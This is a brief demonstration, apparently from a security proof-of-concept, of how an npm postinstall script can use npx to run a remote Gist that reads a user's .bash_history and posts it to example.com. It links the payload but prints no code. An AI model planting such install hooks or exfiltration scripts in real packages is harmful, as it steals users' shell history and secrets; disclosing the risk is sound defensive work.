Using a postinstall npm script, I can invoke npx to a random Gist script that can steal your stuff.
It's runs this script: https://gist.github.com/tanepiper/6cb9067adca626cd2c0edbc3786dad7b
Which takes a users .bash_history and posts it to example.com - this could be much more malicious.